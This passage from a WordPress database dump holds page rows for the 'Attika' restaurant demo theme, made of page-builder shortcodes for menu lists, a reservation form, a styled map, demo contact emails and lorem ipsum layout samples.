enable_category=\"no\" category=\"meals\"][vc_empty_space height=\"30px\"][mkdf_portfolio_list type=\"gallery\" number_of_columns=\"four\" space_between_items=\"normal\" number_of_items=\"4\" image_proportions=\"square\" enable_image_shadow=\"no\" orderby=\"date\" order=\"DESC\" item_style=\"gallery-overlay\" title_tag=\"h5\" enable_category=\"no\" category=\"homemade\"][/vc_column][/vc_row]','Four Columns Gallery Wide','','publish','closed','closed','','four-columns-gallery-wide','','','2018-08-14 10:08:19','2018-08-14 10:08:19','',3061,'http://attika.mikado-themes.com/?page_id=1192',0,'page','',0),(3068,1,'2018-08-14 12:32:11','2018-08-14 12:32:11','[vc_row css=\".vc_custom_1534251303879{background-color: #eff5f8 !important;}\"][vc_column][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 5% 0 5%\"][rev_slider_vc alias=\"home\" enable_paspartu=\"no\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1534848855900{padding-top: 0px !important;}\"][mkdf_anchor_menu menu_items=\"%5B%7B%22label%22%3A%22resto%22%2C%22anchor%22%3A%22http%3A%2F%2Fattika.mikado-themes.com%23resto%22%7D%2C%7B%22label%22%3A%22cocktails%22%2C%22anchor%22%3A%22http%3A%2F%2Fattika.mikado-themes.com%23cocktails%22%7D%2C%7B%22label%22%3A%22drinks%22%2C%22anchor%22%3A%22http%3A%2F%2Fattika.mikado-themes.com%23drinks%22%7D%2C%7B%22label%22%3A%22visit%20us%22%2C%22anchor%22%3A%22http%3A%2F%2Fattika.mikado-themes.com%23visitus%22%7D%2C%7B%22label%22%3A%22landing%22%2C%22anchor%22%3A%22http%3A%2F%2Fattika.mikado-themes.com%2Flanding%22%7D%5D\"][/vc_column][/vc_row][vc_row disable_background_image=\"1024\" simple_background_image=\"1751\" background_image_position=\"top center\" css=\".vc_custom_1534849547927{margin-top: -1px !important;}\"][vc_column][vc_empty_space height=\"74px\"][vc_row_inner enable_parallax_background_elements=\"yes\" left_parallax_background_element=\"1251\" right_parallax_background_element=\"1252\" anchor=\"resto\"][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"90px 0 450px 24%\" item_padding_1367_1600=\"90px 0 450px 3%\" item_padding_1025_1366=\"110px 0 450px 0%\" item_padding_769_1024=\"3% 0 441px 17%\" item_padding_681_768=\"60px 0 450px 24%\" item_padding_680=\"36px 10% 450px 10%\"][attika_restaurant_menu_list show_featured_image=\"no\" alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"Cocktails\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1534859739459{padding-top: 100px !important;}\"][vc_column_inner css=\".vc_custom_1534927596297{margin-top: -500px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"78px 0% 0 60%\" item_padding_1367_1600=\"122px 0% 0 56%\" item_padding_1025_1366=\"212px 0% 0 44%\" item_padding_769_1024=\"50px 4% 0 22%\" item_padding_681_768=\"40px 0% 53% 24%\" item_padding_680=\"40px 7% 95% 7%\"][attika_restaurant_menu_list alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"Afterdinner Cocktails\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner css=\".vc_custom_1534927611021{margin-top: -313px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0% 0 23%\" item_padding_769_1024=\"32% 0 0 28%\" item_padding_680=\"0 12% 0 12%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1828\" custom_zindex=\"10\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][vc_row_inner enable_parallax_background_elements=\"yes\" right_parallax_background_element=\"1255\" anchor=\"cocktails\"][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"68% 0% 0 20%\" item_padding_769_1024=\"15% 0 0 19%\" item_padding_680=\"0% 10% 0 10%\" item_padding_681_768=\"17% 0% 0 23%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1254\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"120px 0% 0 35%\" item_padding_1025_1366=\"126px 0% 0 24%\" item_padding_769_1024=\"120px 0 0 25%\" item_padding_681_768=\"105px 0% 0 24%\" item_padding_680=\"120px 4% 0 10%\"][attika_restaurant_menu_list alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"wine\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][vc_row_inner anchor=\"drinks\"][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0px 0\" item_padding_1025_1366=\"110px 0% 0px 0%\" item_padding_769_1024=\"100px 0 0 23%\" item_padding_681_768=\"94px 0% 0px 20%\" item_padding_680=\"53px 2% 0px 10%\"][attika_restaurant_menu_list alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"beer\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"200px\"][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"bottom\" right_parallax_background_element=\"1259\" left_parallax_background_element=\"1488\" css=\".vc_custom_1536850149982{padding-top: 0% !important;padding-bottom: 10% !important;}\"][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0px 0% 0 26%\" item_padding_769_1024=\"0 0 0 5%\" item_padding_681_768=\"0px 0% 0px 19%\" item_padding_680=\"0px 10% 0 10%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1256\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0px 0 0 43%\" item_padding_1367_1600=\"0px 0 0px 23%\" item_padding_1025_1366=\"0px 0 0 14%\" item_padding_769_1024=\"9% 0 0% 12%\" item_padding_681_768=\"104px 0 0 28%\" item_padding_680=\"100px 9% 0 9%\"][attika_restaurant_menu_list alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"Appetizers\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][/vc_column_inner][/vc_row_inner][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"bottom\" right_parallax_background_element=\"1262\" left_parallax_background_element=\"1260\" anchor=\"menu\"][vc_column_inner offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"41px 0 0 55%\" item_padding_1367_1600=\"0px 0 0 55%\" item_padding_1025_1366=\"0px 0 0 53%\" item_padding_769_1024=\"0 0 48px 36%\" item_padding_681_768=\"41px 0 0 21%\" item_padding_680=\"41px 10% 0 10%\"][attika_restaurant_menu_list alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"maindish\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"40px 0% 0 46%\" item_padding_1367_1600=\"130px 0% 0 46%\" item_padding_1025_1366=\"154px 0% 0 46%\" item_padding_769_1024=\"0 21% 0 51%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1507\" custom_zindex=\"10\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"160px\"][vc_row_inner enable_parallax_background_elements=\"yes\" right_parallax_background_element=\"2200\" left_parallax_background_element=\"1263\" anchor=\"visitus\"][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"45% 0% 0 18%\" item_padding_769_1024=\"0% 0 7% 14%\" item_padding_681_768=\"0% 0% 0 18%\" item_padding_680=\"0% 13% 0 13%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1264\" custom_zindex=\"10\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"21px 0 139px 28%\" item_padding_1367_1600=\"67px 0 139px 20%\" item_padding_1025_1366=\"21px 0 139px 11%\" item_padding_769_1024=\"21px 0 139px 20%\" item_padding_681_768=\"106px 0 139px 23%\" item_padding_680=\"87px 10% 100px 10%\"][attika_restaurant_menu_list alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"Desserts\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1535374727085{padding-top: 76px !important;padding-bottom: 25px !important;}\" simple_background_color=\"#eff5f8\"][vc_column][vc_row_inner row_content_width=\"grid\"][vc_column_inner][mkdf_reservation_form open_table_skin=\"light\" open_table_id=\"161697\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1534409161900{padding-top: 8px !important;padding-bottom: 8px !important;}\"][vc_column][/vc_column][/vc_row][vc_row disable_background_image=\"\" css=\".vc_custom_1535968762401{padding-top: 130px !important;padding-bottom: 130px !important;}\" simple_background_image=\"2613\" background_image_position=\"top center\"][vc_column][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0 34% 42px 34%\" item_padding_1367_1600=\"36px 30% 42px 30%\" item_padding_769_1024=\"36px 25% 42px 25%\" item_padding_680=\"0 4% 55px 4%\" item_padding_1025_1366=\"0 31% 42px 31%\" item_padding_681_768=\"0 17% 42px 17%\"][mkdf_section_title type=\"standard\" position=\"center\" title_tag=\"h2\" disable_break_words=\"no\" title=\"visit us\" line_length=\"0px\"]\r\n<p style=\"text-align: center;\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque scelerisque libero sit amet dapibus ornare. Quisque quam erat,</p>\r\n[/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0px 42% 0% 42%\" item_padding_1367_1600=\"0px 40% 0% 40%\" item_padding_1025_1366=\"0px 39% 0% 39%\" item_padding_769_1024=\"0px 35% 0% 35%\" item_padding_681_768=\"0px 31% 0% 31%\" item_padding_680=\"0px 11% 0% 11%\"][mkdf_google_map snazzy_map_style=\"yes\" address1=\"618 St Johns Pl, Brooklyn, NY 11238, USA\" pin=\"1388\" map_height=\"300px\" snazzy_map_code=\"`{`\r\n{\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#f5f5f5``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.icon``,\r\n``stylers``: `{`\r\n{\r\n``visibility``: ``off``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#616161``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.text.stroke``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#f5f5f5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``administrative.land_parcel``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#bdbdbd``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#eeeeee``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#757575``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi.park``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#e5e5e5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi.park``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#ffffff``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.arterial``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#757575``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.highway``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#dadada``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.highway``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#616161``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.local``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``transit.line``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#e5e5e5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``transit.station``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#eeeeee``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``water``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#c9c9c9``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``water``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n}\r\n`}`\" zoom=\"18\"][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"42px 0 0 0\"][vc_column_text]\r\n<p style=\"text-align: center;\"><a href=\"mailto:work@attika.ny\">work@attika.ny</a>\r\n<a href=\"mailto:events@attika.ny\">events@attika.ny</a>\r\n<a href=\"mailto:info@attika.ny\">info@attika.ny</a></p>\r\n[/vc_column_text][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"64px 5% 83px 5%\"][vc_column_text]\r\n<h6 style=\"text-align: center;\">Sol y mar Riccione</h6>\r\n[/vc_column_text][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row]','Restaurant Menu','','publish','closed','closed','','restaurant-menu','','','2020-12-05 17:59:07','2020-12-05 16:59:07','',0,'http://attika.mikado-themes.com/?page_id=1231',0,'page','',0),(3069,1,'2018-08-14 13:09:14','2018-08-14 13:09:14','[vc_row row_content_width=\"grid\" content_width=\"grid\" animate_rounded_tab=\"yes\" css=\".vc_custom_1534339141193{padding-bottom: 78px !important;}\"][vc_column][vc_column_text]\n<h3>IV Columns Layout</h3>\n[/vc_column_text][vc_empty_space height=\"13px\"][vc_row_inner][vc_column_inner offset=\"vc_col-lg-3 vc_col-md-3\"][vc_column_text]Lorem ipsum dolor sit amet, feugiat delicata liberavisse id cum, no quo maiorum intellegebat, liber.[/vc_column_text][vc_empty_space height=\"33px\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-3 vc_col-md-3\"][vc_column_text]Lorem ipsum dolor sit amet, feugiat delicata liberavisse id cum, no quo maiorum intellegebat, liber.[/vc_column_text][vc_empty_space height=\"33px\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-3 vc_col-md-3\"][vc_column_text]Lorem ipsum dolor sit amet, feugiat delicata liberavisse id cum, no quo maiorum intellegebat, liber.[/vc_column_text][vc_empty_space height=\"33px\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-3 vc_col-md-3\"][vc_column_text]Lorem ipsum dolor sit amet, feugiat delicata liberavisse id cum, no quo maiorum intellegebat, liber.[/vc_column_text][vc_empty_space height=\"33px\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_width=\"grid\" animate_rounded_tab=\"yes\" simple_background_color=\"#f8f8f8\" css=\".vc_custom_1534253493197{padding-top: 85px !important;padding-bottom: 77px !important;}\"][vc_column][vc_column_text]\n<h3>III Columns Layout</h3>\n[/vc_column_text][vc_empty_space height=\"13px\"][vc_row_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-4\"][vc_column_text]Lorem ipsum consequuntur, quod nostrum consectetuer usu ut. Vim veniam singulis senserit an, sumo consul mentitum duo ea. Copiosae antiopam ius ea.[/vc_column_text][vc_empty_space height=\"33px\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-4\"][vc_column_text]Lorem ipsum consequuntur, quod nostrum consectetuer usu ut. Vim veniam singulis senserit an, sumo consul mentitum duo ea. Copiosae antiopam ius ea.[/vc_column_text][vc_empty_space height=\"33px\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-4\"][vc_column_text]Lorem ipsum consequuntur, quod nostrum consectetuer usu ut. Vim veniam singulis senserit an, sumo consul mentitum duo ea. Copiosae antiopam ius ea.[/vc_column_text][vc_empty_space height=\"33px\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_width=\"grid\" animate_rounded_tab=\"yes\" css=\".vc_custom_1534253549960{padding-top: 85px !important;padding-bottom: 77px !important;}\"][vc_column][vc_column_text]\n<h3>II Columns Layout</h3>\n[/vc_column_text][vc_empty_space height=\"13px\"][vc_row_inner][vc_column_inner offset=\"vc_col-lg-6 vc_col-md-6\"][vc_column_text]Nam ei eirmod consequuntur, quod nostrum consectetuer usu ut. Vim veniam singulis senserit an, sumo consul mentitum duo ea. Copiosae antiopam ius ea, meis explicari reformidans vix cu.Ut possit patrioque prodesset est, vivendum concludaturque conclusionemque eam in.[/vc_column_text][vc_empty_space height=\"33px\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-6 vc_col-md-6\"][vc_column_text]Nam ei eirmod consequuntur, quod nostrum consectetuer usu ut. Vim veniam singulis senserit an, sumo consul mentitum duo ea. Copiosae antiopam ius ea, meis explicari reformidans vix cu.Ut possit patrioque prodesset est, vivendum concludaturque conclusionemque eam in.[/vc_column_text][vc_empty_space height=\"33px\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_width=\"grid\" animate_rounded_tab=\"yes\" simple_background_color=\"#f8f8f8\" css=\".vc_custom_1534253609963{padding-top: 85px !important;padding-bottom: 77px !important;}\"][vc_column][vc_column_text]\n<h3>I Third / II Thirds</h3>\n[/vc_column_text][vc_empty_space height=\"13px\"][vc_row_inner][vc_column_inner offset=\"vc_col-lg-5 vc_col-md-5\"][vc_column_text]Nam ei eirmod consequuntur, quod nostrum consectetuer usu ut. Vim veniam singulis senserit an, sumo consul mentitum duo ea. Copiosae antiopam ius ea, meis explicari reformidans vix cu.Ut possit patrioque prodesset est.[/vc_column_text][vc_empty_space height=\"33px\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-7 vc_col-md-7\"][vc_column_text]Ferri reque integre mea ut, eu eos vide errem noluisse. Putent laoreet et ius. Vel utroque dissentias ut, nam ad soleat alterum maluisset, cu est copiosae intellegat inciderint. Nam ei eirmod consequuntur, quod nostrum consectetuer usu ut. Vim veniam singulis senserit an, sumo consul mentitum duo ea copiosae antiopam ius.[/vc_column_text][vc_empty_space height=\"33px\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_width=\"grid\" animate_rounded_tab=\"yes\" css=\".vc_custom_1534253600292{padding-top: 85px !important;padding-bottom: 77px !important;}\"][vc_column][vc_column_text]\n<h3>II Thirds / I Third</h3>\n[/vc_column_text][vc_empty_space height=\"13px\"][vc_row_inner][vc_column_inner offset=\"vc_col-lg-7 vc_col-md-7\"][vc_column_text]Ferri reque integre mea ut, eu eos vide errem noluisse. Putent laoreet et ius. Vel utroque dissentias ut, nam ad soleat alterum maluisset, cu est copiosae intellegat inciderint. Nam ei eirmod consequuntur, quod nostrum consectetuer usu ut. Vim veniam singulis senserit.[/vc_column_text][vc_empty_space height=\"33px\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-5 vc_col-md-5\"][vc_column_text]Nam ei eirmod consequuntur, quod nostrum consectetuer usu ut. Vim veniam singulis senserit an, sumo consul mentitum duo ea. Copiosae antiopam ius ea, meis explicari reformidans.[/vc_column_text][vc_empty_space height=\"33px\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_width=\"grid\" animate_rounded_tab=\"yes\" simple_background_color=\"#f8f8f8\" css=\".vc_custom_1534253651419{padding-top: 85px !important;padding-bottom: 77px !important;}\"][vc_column][vc_column_text]\n<h3>I Fourth / III Fourths</h3>\n[/vc_column_text][vc_empty_space height=\"13px\"][vc_row_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-4\"][vc_column_text]Nam ei eirmod consequuntur, quod nostrum consectetuer usu ut. Vim veniam singulis senserit an, sumo consul mentitum duo ea copiosae antiopam sit amet nibh.[/vc_column_text][vc_empty_space height=\"33px\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-8 vc_col-md-8\"][vc_column_text]Ferri reque integre mea ut, eu eos vide errem noluisse. Putent laoreet et ius. Vel utroque dissentias ut, nam ad soleat alterum maluisset, cu est copiosae intellegat inciderint. Nam ei eirmod consequuntur, quod nostrum consectetuer usu ut. Vim veniam singulis senserit an, sumo consul mentitum duo ea. copiosae antiopam ius ea sit amet nibh.[/vc_column_text][vc_empty_space height=\"33px\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_width=\"grid\" animate_rounded_tab=\"yes\" css=\".vc_custom_1534253670577{padding-top: 85px !important;}\"][vc_column][vc_column_text]\n<h3>III Fourths / I Fourth</h3>\n[/vc_column_text][vc_empty_space height=\"13px\"][vc_row_inner][vc_column_inner offset=\"vc_col-lg-8 vc_col-md-8\"][vc_column_text]Ferri reque integre mea ut, eu eos vide errem noluisse. Putent laoreet et ius. Vel utroque dissentias ut, nam ad soleat alterum maluisset, cu est copiosae intellegat inciderint. Nam ei eirmod consequuntur, quod nostrum consectetuer usu ut. Vim veniam singulis senserit an, sumo consul mentitum duo ea. Copiosae antiopam ius ea, meis explicari reformidans vix cu.Ut possit patrioque prodesset est, vivendum concludaturque conclusionemque.[/vc_column_text][vc_empty_space height=\"33px\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-4\"][vc_column_text]Nam ei eirmod consequuntur, quod nostrum consectetuer usu ut. Vim veniam singulis senserit an, sumo consul mentitum duo ea. Copiosae antiopam ius ea, meis explicari reformidans vix cu suis veniam su.[/vc_column_text][vc_empty_space height=\"33px\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]','Columns','','publish','closed','closed','','columns','','','2018-08-14 13:09:14','2018-08-14 13:09:14','',3039,'http://attika.mikado-themes.com/?page_id=1241',0,'page','',0),(3070,1,'2018-08-14 13:51:24','2018-08-14 13:51:24','[vc_row row_content_width=\"grid\"][vc_column][vc_column_text]Lorem ipsum dolor sit amet, at ullum falli pri, putant vulputate per id. His munere quidam in, sed aperiam elaboraret ex. No case fugit persecuti ius, nulla utroque aliquando eos id. Per recteque scribentur definitionem ei. Lorem ipsum dolor sit amet, ad atqui fuisset adipiscing eam, ei quis viderer maiorum pri, eam invidunt erroribus sententiae an. Epicuri persecuti intellegebat an mei, te quo tollit legendos. [mkdf_highlight background_color=\"#fef8f7\" color=\"#111\"]Est habeo gubergren et, noluisse persecuti id sit.No dicit ceteros duo. Usu tractatos repudiandae cu , ei has nulla verear eligendi. Nam persius epicurei ut, causae suscipiantur ex qui, nominavi adolescens eos in. Idvixsen congue noster possit, no sea abhorreant mnesarchum. Civibus prodesset et mel, ut vix invidunt qualisque, sed fringilla mauris justo et netu suisde.Aliquam lorem ante, dapibus in, viverra quis, feugiat a, tellus. Phasellus viverra nulla ut metus varius laoreet. Quisque rutrum. Aenean imperdiet.[/mkdf_highlight] Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui. Etiam rhoncus.Sed fringilla mauris sit amet nibh.[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Lorem ipsum dolor sit amet, at ullum falli pri, putant vulputate per id. His munere quidam in, sed aperiam elaboraret ex. No case fugit persecuti ius, nulla utroque aliquando eos id. [mkdf_highlight background_color=\"#f5f7f8\" color=\"#111\"]Per recteque scribentur definitionem ei. Lorem ipsum dolor sit amet, ad atqui fuisset adipiscing eam, ei quis viderer maiorum pri, eam invidunt erroribus sententiae an. Epicuri persecuti intellegebat an mei, te quo tollit legendos. Est habeo gubergren et, noluisse persecuti id sit.No dicit ceteros duo. Usu tractatos repudiandae cu , ei has nulla verear eligendi. Nam persius epicurei ut, causae suscipiantur ex qui, nominavi adolescens eos in.[/mkdf_highlight] Idvixsen congue noster possit, no sea abhorreant mnesarchum. Civibus prodesset et mel, ut vix invidunt qualisque, sed fringilla mauris justo et netu suisde.Aliquam lorem ante, dapibus in, viverra quis, feugiat a, tellus. Phasellus viverra nulla ut metus varius laoreet. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui. Etiam rhoncus.[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Lorem ipsum dolor sit amet, at ullum falli pri, putant vulputate per id. His munere quidam in, sed aperiam elaboraret ex. No case fugit persecuti ius, nulla utroque aliquando eos id. Per recteque scribentur definitionem ei. Lorem ipsum dolor sit amet, ad atqui fuisset adipiscing eam, ei quis viderer maiorum pri, eam invidunt erroribus sententiae an. Epicuri persecuti intellegebat an mei, te 